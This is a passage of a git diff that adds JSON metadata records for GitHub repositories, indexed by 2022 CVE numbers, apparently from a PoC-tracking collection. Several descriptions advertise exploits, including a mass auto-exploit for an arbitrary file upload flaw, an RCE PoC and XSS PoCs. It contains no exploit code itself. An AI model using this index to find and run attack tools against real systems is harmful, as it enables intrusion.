+ "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.19.72_CVE-2022-42896", + "description": null, + "fork": false, + "created_at": "2023-04-05T09:10:38Z", + "updated_at": "2023-04-05T09:17:08Z", + "pushed_at": "2023-04-05T10:40:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624412266, + "name": "kernel_v4.19.72_CVE-2022-42896_new", + "full_name": "hshivhare67\/kernel_v4.19.72_CVE-2022-42896_new", + "owner": { + "login": "hshivhare67", + "id": 67005408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67005408?v=4", + "html_url": "https:\/\/github.com\/hshivhare67", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hshivhare67\/kernel_v4.19.72_CVE-2022-42896_new", + "description": null, + "fork": false, + "created_at": "2023-04-06T12:12:27Z", + "updated_at": "2023-04-06T12:24:04Z", + "pushed_at": "2023-04-07T06:18:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 624531158, + "name": "kernel_v4.19.72_CVE-2022-42896", + "full_name": "himanshu667\/kernel_v4.19.72_CVE-2022-42896", + "owner": { + "login": "himanshu667", + "id": 130066224, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130066224?v=4", + "html_url": "https:\/\/github.com\/himanshu667", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/himanshu667\/kernel_v4.19.72_CVE-2022-42896", + "description": null, + "fork": false, + "created_at": "2023-04-06T17:17:25Z", + "updated_at": "2023-04-06T17:17:25Z", + "pushed_at": "2023-04-06T17:17:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-42899.json b/2022/CVE-2022-42899.json new file mode 100644 index 0000000000..60c7350250 --- /dev/null +++ b/2022/CVE-2022-42899.json @@ -0,0 +1,33 @@ +[ + { + "id": 553939981, + "name": "CVE-2022-42899", + "full_name": "iamsanjay\/CVE-2022-42899", + "owner": { + "login": "iamsanjay", + "id": 6595915, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6595915?v=4", + "html_url": "https:\/\/github.com\/iamsanjay", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iamsanjay\/CVE-2022-42899", + "description": null, + "fork": false, + "created_at": "2022-10-19T02:13:25Z", + "updated_at": "2023-02-14T14:38:11Z", + "pushed_at": "2022-10-19T02:27:05Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4304.json b/2022/CVE-2022-4304.json new file mode 100644 index 0000000000..108580a021 --- /dev/null +++ b/2022/CVE-2022-4304.json @@ -0,0 +1,33 @@ +[ + { + "id": 631842494, + "name": "Openssl-1.1.1g_CVE-2022-4304", + "full_name": "Trinadh465\/Openssl-1.1.1g_CVE-2022-4304", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/Openssl-1.1.1g_CVE-2022-4304", + "description": null, + "fork": false, + "created_at": "2023-04-24T07:15:33Z", + "updated_at": "2023-04-24T07:18:06Z", + "pushed_at": "2023-04-24T07:18:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43096.json b/2022/CVE-2022-43096.json new file mode 100644 index 0000000000..8eec1ffd16 --- /dev/null +++ b/2022/CVE-2022-43096.json @@ -0,0 +1,33 @@ +[ + { + "id": 567187197, + "name": "Mediatrix-CVE-2022-43096", + "full_name": "ProxyStaffy\/Mediatrix-CVE-2022-43096", + "owner": { + "login": "ProxyStaffy", + "id": 113522001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/113522001?v=4", + "html_url": "https:\/\/github.com\/ProxyStaffy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ProxyStaffy\/Mediatrix-CVE-2022-43096", + "description": null, + "fork": false, + "created_at": "2022-11-17T09:00:52Z", + "updated_at": "2022-11-18T01:18:44Z", + "pushed_at": "2022-11-17T09:06:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43097.json b/2022/CVE-2022-43097.json new file mode 100644 index 0000000000..38484b65b5 --- /dev/null +++ b/2022/CVE-2022-43097.json @@ -0,0 +1,33 @@ +[ + { + "id": 573969775, + "name": "CVE-2022-43097", + "full_name": "nibin-m\/CVE-2022-43097", + "owner": { + "login": "nibin-m", + "id": 22180125, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22180125?v=4", + "html_url": "https:\/\/github.com\/nibin-m", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nibin-m\/CVE-2022-43097", + "description": "All details about CVE-2022-43097", + "fork": false, + "created_at": "2022-12-04T01:59:51Z", + "updated_at": "2022-12-18T10:11:10Z", + "pushed_at": "2022-12-04T02:07:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43117.json b/2022/CVE-2022-43117.json new file mode 100644 index 0000000000..775c3ab08d --- /dev/null +++ b/2022/CVE-2022-43117.json @@ -0,0 +1,33 @@ +[ + { + "id": 568387385, + "name": "CVE-2022-43117", + "full_name": "RashidKhanPathan\/CVE-2022-43117", + "owner": { + "login": "RashidKhanPathan", + "id": 65374016, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65374016?v=4", + "html_url": "https:\/\/github.com\/RashidKhanPathan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RashidKhanPathan\/CVE-2022-43117", + "description": null, + "fork": false, + "created_at": "2022-11-20T11:33:46Z", + "updated_at": "2024-12-19T15:23:20Z", + "pushed_at": "2022-11-20T11:34:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43143.json b/2022/CVE-2022-43143.json new file mode 100644 index 0000000000..02498e72af --- /dev/null +++ b/2022/CVE-2022-43143.json @@ -0,0 +1,33 @@ +[ + { + "id": 547276106, + "name": "beekeeper", + "full_name": "goseungduk\/beekeeper", + "owner": { + "login": "goseungduk", + "id": 42366390, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42366390?v=4", + "html_url": "https:\/\/github.com\/goseungduk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/goseungduk\/beekeeper", + "description": "CVE-2022-43143 PoC", + "fork": false, + "created_at": "2022-10-07T12:19:45Z", + "updated_at": "2023-01-06T06:03:19Z", + "pushed_at": "2022-10-07T12:20:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43144.json b/2022/CVE-2022-43144.json new file mode 100644 index 0000000000..09a533f217 --- /dev/null +++ b/2022/CVE-2022-43144.json @@ -0,0 +1,33 @@ +[ + { + "id": 562258335, + "name": "CVE-2022-43144-Stored-XSS", + "full_name": "mudassiruddin\/CVE-2022-43144-Stored-XSS", + "owner": { + "login": "mudassiruddin", + "id": 22985192, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22985192?v=4", + "html_url": "https:\/\/github.com\/mudassiruddin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mudassiruddin\/CVE-2022-43144-Stored-XSS", + "description": "PoC to exploit CVE-2022-43144", + "fork": false, + "created_at": "2022-11-05T19:30:41Z", + "updated_at": "2024-08-12T20:28:12Z", + "pushed_at": "2022-11-06T00:55:32Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43271.json b/2022/CVE-2022-43271.json new file mode 100644 index 0000000000..efe701c3f2 --- /dev/null +++ b/2022/CVE-2022-43271.json @@ -0,0 +1,33 @@ +[ + { + "id": 580247521, + "name": "CVE-2022-43271", + "full_name": "SecurityWillCheck\/CVE-2022-43271", + "owner": { + "login": "SecurityWillCheck", + "id": 88411151, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88411151?v=4", + "html_url": "https:\/\/github.com\/SecurityWillCheck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SecurityWillCheck\/CVE-2022-43271", + "description": null, + "fork": false, + "created_at": "2022-12-20T04:40:29Z", + "updated_at": "2022-12-21T00:19:14Z", + "pushed_at": "2022-12-20T05:11:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43293.json b/2022/CVE-2022-43293.json new file mode 100644 index 0000000000..910608259a --- /dev/null +++ b/2022/CVE-2022-43293.json @@ -0,0 +1,54 @@ +[ + { + "id": 624878736, + "name": "CVE-2022-43293", + "full_name": "LucaBarile\/CVE-2022-43293", + "owner": { + "login": "LucaBarile", + "id": 74877659, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74877659?v=4", + "html_url": "https:\/\/github.com\/LucaBarile", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucaBarile\/CVE-2022-43293", + "description": "Exploit and report for CVE-2022-43293", + "fork": false, + "created_at": "2023-04-07T13:38:27Z", + "updated_at": "2023-04-07T16:47:13Z", + "pushed_at": "2023-04-07T15:12:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "arbitrary-file-overwrite", + "arbitrary-file-write", + "cng-sys", + "denial-of-service", + "disclosure", + "exploit", + "impersonation", + "link-following", + "link-following-attack", + "mount-point", + "poc", + "proof-of-concept", + "symbolic-link", + "vulnerability", + "wacom", + "wacom-vulnerability", + "windows-denial-of-service", + "write-up", + "zero-day" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43332.json b/2022/CVE-2022-43332.json new file mode 100644 index 0000000000..57d1f01d17 --- /dev/null +++ b/2022/CVE-2022-43332.json @@ -0,0 +1,33 @@ +[ + { + "id": 564247324, + "name": "CVE-2022-43332", + "full_name": "maikroservice\/CVE-2022-43332", + "owner": { + "login": "maikroservice", + "id": 20245897, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20245897?v=4", + "html_url": "https:\/\/github.com\/maikroservice", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maikroservice\/CVE-2022-43332", + "description": "Cross Site Scripting in WonderCMS v3.3.4", + "fork": false, + "created_at": "2022-11-10T10:06:14Z", + "updated_at": "2022-11-12T11:37:02Z", + "pushed_at": "2022-11-10T19:13:11Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43343.json b/2022/CVE-2022-43343.json new file mode 100644 index 0000000000..d63846328e --- /dev/null +++ b/2022/CVE-2022-43343.json @@ -0,0 +1,33 @@ +[ + { + "id": 595861738, + "name": "CVE-2022-43343", + "full_name": "Halcy0nic\/CVE-2022-43343", + "owner": { + "login": "Halcy0nic", + "id": 42481692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42481692?v=4", + "html_url": "https:\/\/github.com\/Halcy0nic", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Halcy0nic\/CVE-2022-43343", + "description": "Proof of concept for (CVE-2022-43343)", + "fork": false, + "created_at": "2023-02-01T00:33:57Z", + "updated_at": "2024-07-02T20:34:09Z", + "pushed_at": "2023-02-01T00:54:27Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43369.json b/2022/CVE-2022-43369.json new file mode 100644 index 0000000000..cfe724ef6e --- /dev/null +++ b/2022/CVE-2022-43369.json @@ -0,0 +1,33 @@ +[ + { + "id": 572050236, + "name": "CVE-2022-43369", + "full_name": "sudoninja-noob\/CVE-2022-43369", + "owner": { + "login": "sudoninja-noob", + "id": 18701598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18701598?v=4", + "html_url": "https:\/\/github.com\/sudoninja-noob", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sudoninja-noob\/CVE-2022-43369", + "description": null, + "fork": false, + "created_at": "2022-11-29T12:58:59Z", + "updated_at": "2022-11-30T06:11:36Z", + "pushed_at": "2022-11-29T13:00:22Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43571.json b/2022/CVE-2022-43571.json new file mode 100644 index 0000000000..4fed478936 --- /dev/null +++ b/2022/CVE-2022-43571.json @@ -0,0 +1,33 @@ +[ + { + "id": 582561156, + "name": "CVE-2022-43571", + "full_name": "ohnonoyesyes\/CVE-2022-43571", + "owner": { + "login": "ohnonoyesyes", + "id": 93457304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93457304?v=4", + "html_url": "https:\/\/github.com\/ohnonoyesyes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ohnonoyesyes\/CVE-2022-43571", + "description": null, + "fork": false, + "created_at": "2022-12-27T08:00:44Z", + "updated_at": "2022-12-27T08:00:44Z", + "pushed_at": "2022-12-27T08:01:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43680.json b/2022/CVE-2022-43680.json new file mode 100644 index 0000000000..94e8532999 --- /dev/null +++ b/2022/CVE-2022-43680.json @@ -0,0 +1,64 @@ +[ + { + "id": 578580664, + "name": "external_expat-2.1.0_CVE-2022-43680", + "full_name": "Trinadh465\/external_expat-2.1.0_CVE-2022-43680", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/external_expat-2.1.0_CVE-2022-43680", + "description": null, + "fork": false, + "created_at": "2022-12-15T11:52:14Z", + "updated_at": "2023-12-18T19:22:49Z", + "pushed_at": "2022-12-15T12:21:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 579853949, + "name": "external_expat_2.1.0_CVE-2022-43680", + "full_name": "nidhihcl\/external_expat_2.1.0_CVE-2022-43680", + "owner": { + "login": "nidhihcl", + "id": 121002296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/121002296?v=4", + "html_url": "https:\/\/github.com\/nidhihcl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nidhihcl\/external_expat_2.1.0_CVE-2022-43680", + "description": null, + "fork": false, + "created_at": "2022-12-19T05:09:12Z", + "updated_at": "2022-12-19T05:25:40Z", + "pushed_at": "2022-12-19T05:26:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43704.json b/2022/CVE-2022-43704.json new file mode 100644 index 0000000000..9f9289e8d5 --- /dev/null +++ b/2022/CVE-2022-43704.json @@ -0,0 +1,33 @@ +[ + { + "id": 531025997, + "name": "CVE-2022-43704", + "full_name": "9lyph\/CVE-2022-43704", + "owner": { + "login": "9lyph", + "id": 44860700, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44860700?v=4", + "html_url": "https:\/\/github.com\/9lyph", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/9lyph\/CVE-2022-43704", + "description": "Sinilink XY-WFTX Wifi Remote Thermostat Module Temperature Controller", + "fork": false, + "created_at": "2022-08-31T10:00:09Z", + "updated_at": "2024-10-04T02:48:39Z", + "pushed_at": "2024-10-04T02:48:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-4395.json b/2022/CVE-2022-4395.json new file mode 100644 index 0000000000..9027dcdfce --- /dev/null +++ b/2022/CVE-2022-4395.json @@ -0,0 +1,33 @@ +[ + { + "id": 611731156, + "name": "CVE-2022-4395", + "full_name": "MrG3P5\/CVE-2022-4395", + "owner": { + "login": "MrG3P5", + "id": 57594747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57594747?v=4", + "html_url": "https:\/\/github.com\/MrG3P5", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrG3P5\/CVE-2022-4395", + "description": "Mass Auto Exploit CVE-2022-4395 Unauthenticated Arbitrary File Upload", + "fork": false, + "created_at": "2023-03-09T12:35:48Z", + "updated_at": "2024-02-21T18:34:48Z", + "pushed_at": "2023-03-09T12:46:45Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43959.json b/2022/CVE-2022-43959.json new file mode 100644 index 0000000000..982a13f486 --- /dev/null +++ b/2022/CVE-2022-43959.json @@ -0,0 +1,33 @@ +[ + { + "id": 558768361, + "name": "CVE-2022-43959", + "full_name": "secware-ru\/CVE-2022-43959", + "owner": { + "login": "secware-ru", + "id": 116876868, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/116876868?v=4", + "html_url": "https:\/\/github.com\/secware-ru", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/secware-ru\/CVE-2022-43959", + "description": "Bitrix Vulnerability CVE-2022-43959", + "fork": false, + "created_at": "2022-10-28T08:52:17Z", + "updated_at": "2024-07-08T21:00:34Z", + "pushed_at": "2023-03-18T10:34:26Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-43980.json b/2022/CVE-2022-43980.json new file mode 100644 index 0000000000..567f9db358 --- /dev/null +++ b/2022/CVE-2022-43980.json @@ -0,0 +1,33 @@ +[ + { + "id": 602645546, + "name": "CVE-2022-43980", + "full_name": "Argonx21\/CVE-2022-43980", + "owner": { + "login": "Argonx21", + "id": 30073895, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30073895?v=4", + "html_url": "https:\/\/github.com\/Argonx21", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Argonx21\/CVE-2022-43980", + "description": "Stored Cross Site Scripting Vulnerability in the network maps edit functionality", + "fork": false, + "created_at": "2023-02-16T16:42:12Z", + "updated_at": "2023-02-16T16:42:12Z", + "pushed_at": "2023-02-16T17:03:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44118.json b/2022/CVE-2022-44118.json new file mode 100644 index 0000000000..60caf527e4 --- /dev/null +++ b/2022/CVE-2022-44118.json @@ -0,0 +1,33 @@ +[ + { + "id": 600342998, + "name": "CVE-2022-44118-Exploit", + "full_name": "Athishpranav2003\/CVE-2022-44118-Exploit", + "owner": { + "login": "Athishpranav2003", + "id": 105591739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105591739?v=4", + "html_url": "https:\/\/github.com\/Athishpranav2003", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Athishpranav2003\/CVE-2022-44118-Exploit", + "description": "PoC Exploit for RCE vulnerability in DedeCMS v6.1.9", + "fork": false, + "created_at": "2023-02-11T07:29:08Z", + "updated_at": "2023-02-11T07:30:47Z", + "pushed_at": "2023-07-04T07:17:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44136.json b/2022/CVE-2022-44136.json new file mode 100644 index 0000000000..b98cb4ae44 --- /dev/null +++ b/2022/CVE-2022-44136.json @@ -0,0 +1,33 @@ +[ + { + "id": 653887200, + "name": "CVE-2022-44136-exploit", + "full_name": "IgorDuino\/CVE-2022-44136-exploit", + "owner": { + "login": "IgorDuino", + "id": 74809945, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74809945?v=4", + "html_url": "https:\/\/github.com\/IgorDuino", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/IgorDuino\/CVE-2022-44136-exploit", + "description": "Exploit for CVE-2022-44136 for chcking security of your site", + "fork": false, + "created_at": "2023-06-15T00:52:11Z", + "updated_at": "2023-06-15T00:52:11Z", + "pushed_at": "2023-06-15T00:52:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44149.json b/2022/CVE-2022-44149.json new file mode 100644 index 0000000000..1a829fe287 --- /dev/null +++ b/2022/CVE-2022-44149.json @@ -0,0 +1,79 @@ +[ + { + "id": 586048910, + "name": "CVE-2022-44149", + "full_name": "yerodin\/CVE-2022-44149", + "owner": { + "login": "yerodin", + "id": 9205071, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9205071?v=4", + "html_url": "https:\/\/github.com\/yerodin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yerodin\/CVE-2022-44149", + "description": "POC Exploit for CVE-2022-44149", + "fork": false, + "created_at": "2023-01-06T20:00:25Z", + "updated_at": "2023-01-07T17:03:57Z", + "pushed_at": "2023-01-25T03:08:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 840469662, + "name": "CVE-2022-44149", + "full_name": "geniuszly\/CVE-2022-44149", + "owner": { + "login": "geniuszly", + "id": 137893386, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/137893386?v=4", + "html_url": "https:\/\/github.com\/geniuszly", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geniuszly\/CVE-2022-44149", + "description": "it is script designed to interact with a router by sending a payload to its system tools. The script retrieves the router's configuration from environment variables to ensure security. It includes functions for generating an authorization header, sending a payload, and logging the process.", + "fork": false, + "created_at": "2024-08-09T19:27:22Z", + "updated_at": "2024-10-06T16:41:28Z", + "pushed_at": "2024-08-09T19:28:51Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2022-44149", + "cybersecurity", + "ethical-hacking", + "exploit", + "exploit-development", + "linux", + "payload", + "penetration-testing", + "poc", + "privilege-escalation", + "security", + "vulnerability", + "vulnerability-research" + ], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44183.json b/2022/CVE-2022-44183.json new file mode 100644 index 0000000000..725b786831 --- /dev/null +++ b/2022/CVE-2022-44183.json @@ -0,0 +1,33 @@ +[ + { + "id": 581552187, + "name": "CVE-2022-44183", + "full_name": "flagqaz\/CVE-2022-44183", + "owner": { + "login": "flagqaz", + "id": 96327717, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96327717?v=4", + "html_url": "https:\/\/github.com\/flagqaz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/flagqaz\/CVE-2022-44183", + "description": "This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-44183 Made by Sn0wAlice. ❤️", + "fork": false, + "created_at": "2022-12-23T14:24:28Z", + "updated_at": "2022-12-26T18:40:13Z", + "pushed_at": "2022-12-23T14:21:03Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44215.json b/2022/CVE-2022-44215.json new file mode 100644 index 0000000000..64aa8a687e --- /dev/null +++ b/2022/CVE-2022-44215.json @@ -0,0 +1,33 @@ +[ + { + "id": 579926041, + "name": "CVE-2022-44215", + "full_name": "JBalanza\/CVE-2022-44215", + "owner": { + "login": "JBalanza", + "id": 31896165, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31896165?v=4", + "html_url": "https:\/\/github.com\/JBalanza", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JBalanza\/CVE-2022-44215", + "description": "Public disclosure of TitanFTP 19.X Open Redirection vulnerability", + "fork": false, + "created_at": "2022-12-19T09:34:49Z", + "updated_at": "2024-03-27T20:36:30Z", + "pushed_at": "2022-12-19T11:53:34Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-44268.json b/2022/CVE-2022-44268.json new file mode 100644 index 